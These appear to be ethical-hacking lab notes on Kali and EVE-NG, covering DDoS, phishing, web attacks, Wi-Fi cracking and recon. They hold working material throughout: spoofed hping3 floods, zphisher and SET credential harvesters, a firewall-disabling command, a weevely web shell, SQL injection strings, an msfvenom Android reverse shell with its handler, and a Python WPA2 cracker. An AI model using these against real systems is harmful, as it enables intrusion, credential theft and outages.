install bots on them
they create a bot network (botnet)
the master handler controls that malicious code
compromised nodes are termed zombies
zombies combine to attack the main target
**impacts
loss of goodwill
disabled services
financial loss
disabled network

DDoS attack vectors

volumetric attacks
consume the bandwidth of the target network
magnitude measured in bits per second
a type of bandwidth depletion
>> flood attacks
>> amplification attacks
attack techniques:
UDP flood attacks
ICMP flood attack
ping of death attack
pulse wave attack
protocol attacks
consume other types of resources, such as connection state tables
measured in packets per second
target load balancers, firewalls, application servers
SYN flooding
spoofed session flood attack
ACK flood attack
fragmentation attack
TCP SACK panic attack

application layer attacks

use the resources of the application service
magnitude measured in requests per second
HTTP GET/POST attack
slowloris attack
UDP application layer attack
DDoS extortion attack

smurf attack
on the victim open Wireshark
ICMP filter
on Kali
ping the destination
hping3 -1 --flood -a 150.1.7.115 150.1.7.255 (ICMP mode, spoof the victim's IP .115 as the source, send to the broadcast address; every host replies to the victim)
Ctrl+C to stop

LAND attack
run the Windows 10 Apache server
we send a SYN packet with the victim as both source and destination, so the victim's stack keeps answering itself

on Kali
hping3 -S -p 80 150.1.7.102 -a 150.1.7.102 --flood
enable port 80 on the router:
conf t
ip http server
debug ip packet

add a PC in EVE
set pcname pc1
ip 150.1.7.x 150.1.7.100
on Kali
ping of death attack
we increase the size of the packet
ping the victim IP
ping <ip> -l 65500 -t (Windows ping: -l sets the payload size, -t keeps sending; modern stacks are no longer affected)

ICMP flood attack

ping <ip>
hping3 -1 --flood -a <spoofed source ip> <destination ip>
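The detection side of the four hping3 attacks above (smurf, LAND, ping of death, SYN flood), run over packet summaries of the kind Wireshark shows. This is an added example, not from the notes: the capture is constructed (normal traffic first, then each attack), the broadcast address is the lab's 150.1.7.255, and the SYN-flood threshold is a value chosen for the demo, not a standard.

```python
"""Added example (not from the notes): rules that recognise LAND, smurf,
ping-of-death and SYN-flood traffic in a list of packet summaries."""
from collections import Counter
from dataclasses import dataclass

BROADCAST = "150.1.7.255"
MAX_IP_PACKET = 65535


@dataclass
class Pkt:
    src: str
    dst: str
    proto: str          # "tcp" or "icmp"
    flags: str = ""     # tcp flags, e.g. "S", "SA", "A"
    dport: int = 0
    length: int = 64    # reassembled IP length
    icmp_type: int = 8  # 8 = echo request, 0 = echo reply


def detect(packets, syn_threshold=20):
    """Return a list of (rule, detail) findings, de-duplicated because a
    --flood produces thousands of identical packets."""
    findings = {}
    syn_by_dst, ack_by_dst = Counter(), Counter()
    for p in packets:
        # LAND: source == destination makes a TCP stack answer itself.
        if p.proto == "tcp" and "S" in p.flags and p.src == p.dst:
            findings[("land", f"{p.src}->{p.dst}:{p.dport}")] = None
        # Smurf: ICMP echo to the broadcast address; every host replies to
        # the (spoofed) source.
        if p.proto == "icmp" and p.icmp_type == 8 and p.dst == BROADCAST:
            findings[("smurf", f"echo to broadcast, spoofed src {p.src}")] = None
        # Ping of death: reassembled datagram larger than IP allows.
        if p.proto == "icmp" and p.length > MAX_IP_PACKET:
            findings[("ping_of_death", f"{p.src} sent {p.length} bytes")] = None
        # SYN flood: many SYNs to one port with almost no handshakes finishing.
        if p.proto == "tcp" and p.flags == "S":
            syn_by_dst[(p.dst, p.dport)] += 1
        elif p.proto == "tcp" and p.flags == "A":
            ack_by_dst[(p.dst, p.dport)] += 1
    for key, n in syn_by_dst.items():
        acks = ack_by_dst[key]
        if n >= syn_threshold and acks < n // 2:
            findings[("syn_flood", f"{n} SYN vs {acks} ACK to {key[0]}:{key[1]}")] = None
    return list(findings)


def sample_capture():
    """Constructed capture: one normal handshake and ping, then the attacks."""
    pkts = [
        Pkt("150.1.7.101", "150.1.7.102", "tcp", "S", 80),
        Pkt("150.1.7.102", "150.1.7.101", "tcp", "SA", 80),
        Pkt("150.1.7.101", "150.1.7.102", "tcp", "A", 80),
        Pkt("150.1.7.101", "150.1.7.102", "icmp"),
    ]
    pkts += [Pkt("150.1.7.102", "150.1.7.102", "tcp", "S", 80)] * 3          # LAND
    pkts += [Pkt("150.1.7.115", BROADCAST, "icmp")] * 5                        # smurf
    pkts += [Pkt("150.1.7.101", "150.1.7.102", "icmp", length=65536 + 28)]     # ping of death
    pkts += [Pkt(f"10.0.0.{i}", "150.1.7.102", "tcp", "S", 80) for i in range(1, 41)]  # SYN flood
    return pkts


if __name__ == "__main__":
    for rule, detail in detect(sample_capture()):
        print(f"{rule:14} {detail}")
```

In production the same rules run over NetFlow or Zeek conn logs rather than individual packets, and the SYN threshold is tuned per service from a baseline.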

26 June 2023
social engineering targets the social behaviour of the target
phishing: the attacker deceives people into revealing information or installing malware.
Kali Linux has the Social-Engineer Toolkit (SET)
applications >> social engineering toolkit
encrypt the payload if it is detected by Android
the encryption may be an algorithm written in Python

option 1 (social-engineering attacks)
option 2 (website attack vectors)
option 3 (credential harvester attack method)
1
150.1.7.101 (IP for the POST back)
3
in the browser: Kali's IP
run it through an IP-to-URL converter
long-to-short URL
zphisher on GitHub
code
select the path and copy
git clone <pasted path>
ls
chmod a+x zphisher // grant execute permissions
ls -ltr
cd zphisher
ls
bash zphisher.sh
01
02
n
n
copy the link

netsh advfirewall set allprofiles state off (saved as a .bat; disables the Windows firewall on all profiles)

pentmenu on GitHub
./pentmenu (or run it with bash)

clients send an HTTP request to the server

>> the server responds to the client
web application stack:
custom application // business logic
third-party components // open source
web server // Apache
database // MySQL
operating system // Windows, Linux
network // router, switch
security // IPS, IDS

OWASP
Open Web Application Security Project

linux-bwapp (bee-box) in EVE-NG
addons/qemu
cd /opt/unetlab/addons/qemu/
/opt/unetlab/wrapper/unl/wrapper -a fixpermissions
ls
right click, add node, linux-bwapp
connect it to the switch
give it the 150.1.7.200 IP
top right
enable wired network
left
console
ifconfig
user: bee
password: bug
choose bug
system preferences >> keyboard
layout
UK
remove Belgium
network
manual configuration
unlock
bug
wired connection
disable roaming mode
150.1.7.200
255.255.255.0
gateway 150.1.7.100
OK
sudo su
bug
cd /etc
cd init.d
ls
./networking
./networking restart

session hijacking
cross-site scripting to access cookies, man in the middle,
sniffing
the attacker seizes control of a valid TCP communication session between two computers
active hijacking breaks the session between server and client and the attacker controls it himself
passive hijacking listens to and records all traffic flowing between client and server
spoofing: the attacker pretends to be a user or another machine
hijacking: seizing an active session
Burp Suite for session hijacking
cd burp-suit
ls
./kali_linux......

Burp Suite (GitHub clone)
OK
copy key
agree
paste key
manual activation
copy the data and paste it here
copy and paste
finish
temporary project
start
proxy
intercept
browser settings
network settings
manual proxy
127.0.0.1 port 8080 \ also use it for HTTPS
http://burp/
CA certificate
settings
search certificates
import (so Burp can intercept HTTPS without browser warnings)
to visit the web and mail server:
testphp.vulnweb.com
intercept on
sign up
forward
user name / password: test
right click
do intercept >> response to this request
your profile
connection
cookie: paste the copied cookie (replaying another user's session cookie takes over their session)

wireless network hacking

WPA-PSK uses a user-defined passphrase to initialize TKIP; the per-packet keys themselves are not crackable, but the pre-shared key can be brute-forced with a dictionary attack
WPA/WPA2 authentication: by capturing the right packets of the handshake, crack the WPA key offline
4-way handshake
the client proves it knows the PSK
grab the handshake
by brute force
by online resources
wait for a new client login, or
deauthentication
force a connected client to disconnect, then capture the handshake as it reconnects
brute-force WPA keys: aircrack-ng, aireplay-ng, KisMAC tools
adapters: Atheros AR9271
Netis WF2505
available at Hafeez Center for about Rs 3700
Realtek / Alfa devices
go to VM
removable devices
connect the adapter to the virtual machine
on Kali
>>>>>> iw dev
iwconfig
airmon-ng; airodump-ng; aireplay-ng; aircrack-ng
airmon-ng is used for enabling monitor mode
airodump-ng captures the WPA handshake
aireplay-ng runs deauthentication attacks
aircrack-ng brute-forces the key
airmon-ng check
airmon-ng check kill (kills processes that interfere with monitor mode)
airmon-ng check
airmon-ng start wlan0
iwconfig (the interface is now wlan0mon)
airodump-ng wlan0mon
copy the AP's MAC (BSSID), name and channel
airodump-ng --bssid <AP MAC> -c 1 -w /home/kali/wireless/test wlan0mon

ls
mkdir wireless
cd wireless

aireplay-ng --deauth 5 -a <AP MAC> -c <client station MAC> wlan0mon

airodump-ng shows "WPA handshake:" once it is captured
in the wireless folder
ls
wireshark <capture file>
filter eapol in Wireshark
expand WPA Key MIC
copy the key MIC
>> EAPOL: Extensible Authentication Protocol over LAN
cd /usr/share/
ls
cd wordlists
ls
vim words.txt
cisco123
corvit123
:wq
cat words.txt
aircrack-ng /home/kali/wireless/test-01.cap -w /usr/share/wordlists/words.txt (airodump-ng adds -01 to the file name; -w takes a wordlist file, not the directory)
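What aircrack-ng does with the captured handshake and the wordlist, in plain Python. This is an added example, not from the notes or from the aircrack-ng project: it derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), expands it to the PTK with the 802.11i PRF, takes the KCK (first 16 bytes) and checks HMAC-SHA1 over EAPOL message 2 against the captured MIC. The handshake below is constructed (SSID, MACs, nonces and a known passphrase) so the cracker can be run offline against a short wordlist; with a real `.cap` you would read those values out of Wireshark's `eapol` frames.

```python
"""Added example (not from the notes): WPA2-PSK dictionary attack against a
constructed 4-way handshake, the computation behind `aircrack-ng -w`."""
import hashlib
import hmac

# Constructed handshake parameters (a real capture supplies these).
SSID = b"corvit-lab"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81          # MIC field position inside an EAPOL-Key frame


def pmk(passphrase, ssid):
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11i PRF-512 from HMAC-SHA1 (expands the PMK into the PTK)."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def ptk(pmk_, ap_mac, sta_mac, anonce, snonce):
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """Key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_msg2(passphrase):
    """Constructed message 2 of the handshake, MIC'd with `passphrase`."""
    body = (b"\x02"               # descriptor type RSN
            + b"\x01\x0a"         # key info: version 2 (HMAC-SHA1), pairwise, MIC
            + b"\x00\x10"         # key length
            + b"\x00" * 8         # replay counter
            + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * 16        # MIC placeholder
            + b"\x00\x00")        # key data length
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    kck = ptk(pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(msg2, wordlist, ssid=SSID):
    """Dictionary attack: PMK -> PTK -> KCK per candidate, compare MICs.
    The 4096-round PBKDF2 is why this is slow (aircrack reports keys/second)."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + b"\x00" * 16 + msg2[MIC_OFFSET + 16:]
    for cand in wordlist:
        kck = ptk(pmk(cand, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return cand
    return None


WORDLIST = [b"password", b"cisco123", b"corvit123", b"letmein"]

if __name__ == "__main__":
    print(crack(build_msg2(b"corvit123"), WORDLIST))
```

The only defence the network owner has is the passphrase itself: every derived key is a pure function of passphrase, SSID and captured values, so a passphrase that is not in any wordlist is the whole game. (WPA3-SAE removes this offline attack.)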

decryption

server hacking
compute (CPU + RAM)
networking components
storage (HDD / SSD)
in the cloud, compute is measured in vCPUs
PC / server
web servers: Apache, nginx, Microsoft IIS; they associate services and store data in specific compartments
for domain information:
whois database
whois.domaintools.com
robtex.com
knock.py: git clone the repository

ls
cd knock
ls
pip3 install -r requirements.txt
python3 knock.py <domain>
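The wordlist-driven subdomain enumeration that subbrute (footprinting section above) and knock.py perform, as an added example that is not code from either project. The resolver is injected so the demo runs offline: `fake_resolver` and its `ZONE` are constructed, and in real use you pass `socket.gethostbyname` (the default). It also does the wildcard check that trips up both tools: when the zone answers every name with the same IP, every word "resolves" and the results are worthless.

```python
"""Added example (not from the notes): DNS subdomain brute force with an
injectable resolver and a wildcard check. ZONE and fake_resolver are
constructed stand-ins for a real DNS server."""
import socket
from concurrent.futures import ThreadPoolExecutor


def brute_subdomains(domain, words, resolve=socket.gethostbyname, workers=16):
    """Try word.domain for each word and keep the ones that resolve.
    Returns {fqdn: ip}."""
    def attempt(word):
        fqdn = f"{word}.{domain}"
        try:
            return fqdn, resolve(fqdn)
        except OSError:           # socket.gaierror on NXDOMAIN
            return fqdn, None

    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(attempt, words))
    return {fqdn: ip for fqdn, ip in results if ip}


def wildcard_check(domain, resolve=socket.gethostbyname):
    """Probe a label that should not exist; if it resolves, the zone has a
    wildcard record and that IP must be discarded from the results."""
    try:
        return resolve(f"zz9x7q2unlikely.{domain}")
    except OSError:
        return None


def enumerate_subdomains(domain, words, resolve=socket.gethostbyname):
    """Brute force minus any wildcard answers."""
    wildcard_ip = wildcard_check(domain, resolve)
    found = brute_subdomains(domain, words, resolve)
    return {fqdn: ip for fqdn, ip in found.items() if ip != wildcard_ip}


# Constructed zone used instead of real DNS so the example runs offline.
ZONE = {
    "www.corvit.com": "150.1.7.10",
    "mail.corvit.com": "150.1.7.25",
    "dev.corvit.com": "150.1.7.30",
}


def fake_resolver(name):
    if name in ZONE:
        return ZONE[name]
    raise socket.gaierror(-2, "Name or service not known")


def wildcard_resolver(name):
    """Constructed zone where every name resolves to one address."""
    return "203.0.113.1"


WORDS = ["www", "mail", "ftp", "dev", "vpn"]

if __name__ == "__main__":
    print(enumerate_subdomains("corvit.com", WORDS, fake_resolver))
```

Against a real domain use a larger wordlist (the one shipped with subbrute or SecLists) and keep the worker count modest; the queries go to the target's authoritative servers and are visible in their logs.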

generating a payload with weevely

weevely generate 12345 /root/shell.php
weevely http://150.1.7.104/dvwa/hackable/uploads/shell.php 12345
/////////////////////// hacking web applications /////////////////////

DHCP
types of web services
SOAP

Kali
open Kali
open Metasploitable
access the DVWA login
turn on the proxy

SQL injection
testphp.vulnweb.com
login test / test
root: /var/www/mutillidae
ls
config.inc
vim config.inc
dbname owasp10
aaa' or 1=1 #

or

admin'# no need to enter the password
root

' OR '1'='1
MALTEGO
apt update, apt upgrade
apt install maltego
maltego
register with an email address

on Windows: Maltego community edition


Scancat discovery browser
Yandex browser
c:\> telnet <ip or domain name> 80
GET / HTTP/1.0 (manual banner grab)
command 2:
openssl s_client -host ww... -port ..
wafw00f <target> for WAF detection
ls /usr/share/nmap/scripts | grep -e "http-waf" (nmap's WAF detection scripts)

lbd <domain> (load balancer detection)
dig <domain>
wafw00f <domain>

API security
and IoT security
examine the URL, HTTP headers, query string parameters, POST data, cookies
User-Agent, Referer, Accept, Accept-Language, Host headers
server fingerprinting
examine the URL
examine session tokens
whatweb
whatweb -v <web name>
censys.io
git clone the Sherlock project

pip install -r requirements.txt

python3 sherlock <username>

for website cloning

wget -h
wget -r www.corvit.com
wget www.corvit.com

saveweb2zip.com
for web cloning
visual workbench of NetBrains

web shells: c99
Caterpillar webshell
China Chopper
r57
PHP-based web shells allow monitoring running processes, executing remote commands, downloading/uploading and erasing files
demo.testfire.net
for SQL injection tests:
' OR 1=1--
' OR '1'='1
WIFIPHISHER
Android VM for the payload:
file
new VM
next
next
install later
Linux 5.x or later
next
name
processor
at least 2 GB RAM
next, NAT
LSI
SCSI
use an existing virtual disk
browse to the vmdk
enable accelerated 3D graphics
close, finish
create the payload from Kali:
ifconfig eth1
msfvenom -p android/meterpreter/reverse_tcp LHOST=150.1.7.101 LPORT=1234 R > giu.apk
mv giu.apk /var/www/html
ls /var/www/html
service apache2 start
msfconsole -q
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 150.1.7.101
set LPORT 1234
show options
run

1'2000%23 (%23 is a URL-encoded #, which comments out the rest of the query)
SCSI: Small Computer System Interface {protocol used to communicate between CPU and HDD}
JBOD: just a bunch of disks
SAS: Serial Attached SCSI {used the same way for HDD/CPU communication}
SATA (Serial ATA); NVMe (Non-Volatile Memory Express) is the de facto protocol for SSDs
sqlmap
on Kali
DVWA security: low
activate the proxy
copy the PHPSESSID
URL
Kali console
sqlmap -u "<URL of the SQL blind injection page, in double quotes>" --cookie="PHPSESSID=<cookie value>; security=low" -D dvwa -T users --columns --dump (without the security=low cookie DVWA redirects sqlmap to the login page)
y
y
sqlitebrowser session.sqlite
create a new database
name it MYDB, save on the desktop
my first table
add
name ali, select type
hasan numeric

download and add in the qemu folder of EVE

bee
bug
m' order by 8-- (MySQL needs a space after the --; increase the number until it errors to learn the column count)
m' union all select 1,database(),3,4,5,6,7-- 
m' union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users' and table_schema=database()-- 
fetch data from bWAPP with sqlmap
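The login bypass (`admin'#`, `' OR '1'='1`) from the mutillidae/DVWA section and the ORDER BY / UNION extraction from the bWAPP section, reproduced against an in-memory SQLite database so they run offline, with the parameterised fix next to the vulnerable query. This is an added example, not from the notes or any of those applications: the tables, rows and credentials are constructed, and SQLite's comment syntax is `--` (the `#` form in the notes is MySQL-specific), so the payloads use `-- `.

```python
"""Added example (not from the notes): SQL injection login bypass, column
counting and UNION extraction against an in-memory SQLite database, plus
the parameterised query that closes the hole. All data is constructed."""
import sqlite3


def setup():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, password TEXT);
        INSERT INTO users(login, password) VALUES ('admin', 'S3cret!'), ('bee', 'bug');
        CREATE TABLE movies(id INTEGER PRIMARY KEY, title TEXT, year INTEGER);
        INSERT INTO movies(title, year) VALUES ('Matrix', 1999), ('Hackers', 1995);
    """)
    return db


def login_vulnerable(db, user, pwd):
    """String-built query: attacker input becomes SQL."""
    q = f"SELECT login FROM users WHERE login='{user}' AND password='{pwd}'"
    row = db.execute(q).fetchone()
    return row[0] if row else None


def login_fixed(db, user, pwd):
    """Parameterised query: input is always data, never SQL."""
    row = db.execute("SELECT login FROM users WHERE login=? AND password=?",
                     (user, pwd)).fetchone()
    return row[0] if row else None


def search_vulnerable(db, title):
    """A bWAPP-style search box that returns 3 columns."""
    q = f"SELECT id, title, year FROM movies WHERE title LIKE '%{title}%'"
    return db.execute(q).fetchall()


def count_columns(db):
    """`' ORDER BY n-- ` until it errors reveals the column count a UNION must match."""
    n = 1
    while True:
        try:
            search_vulnerable(db, f"' ORDER BY {n}-- ")
            n += 1
        except sqlite3.OperationalError:
            return n - 1


def dump_users_via_union(db):
    """UNION the users table into the movie results; the 'pwn' marker in the
    first column separates injected rows from real ones."""
    payload = "' UNION ALL SELECT 'pwn', login, password FROM users-- "
    return [(r[1], r[2]) for r in search_vulnerable(db, payload) if r[0] == "pwn"]


if __name__ == "__main__":
    db = setup()
    print("bypass:", login_vulnerable(db, "admin'-- ", "wrong"))
    print("fixed: ", login_fixed(db, "admin'-- ", "wrong"))
    print("columns:", count_columns(db))
    print("dump:", dump_users_via_union(db))
```

`count_columns` is the manual version of what sqlmap automates; the fix is the same in every language: bind parameters, never concatenate.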

AWS
search IAM
manage access to AWS resources; open the link in a tab
users >> add user
cloud1
create the IAM user
custom password
create the user
download the credentials (.csv)

IAM
sign in with the account alias, the IAM user name (cloud1) and its password (keep the password out of the notes)
IOPS: input/output operations per second
MobaXterm for accessing EC2
public IP
ec2-user
advanced SSH
use the private key
OK
cat /etc/os-release

#!/bin/bash // EC2 user data script

sudo su
yum update -y
yum install -y httpd
systemctl start httpd.service
systemctl enable httpd.service
echo "hello world" > /var/www/html/index.html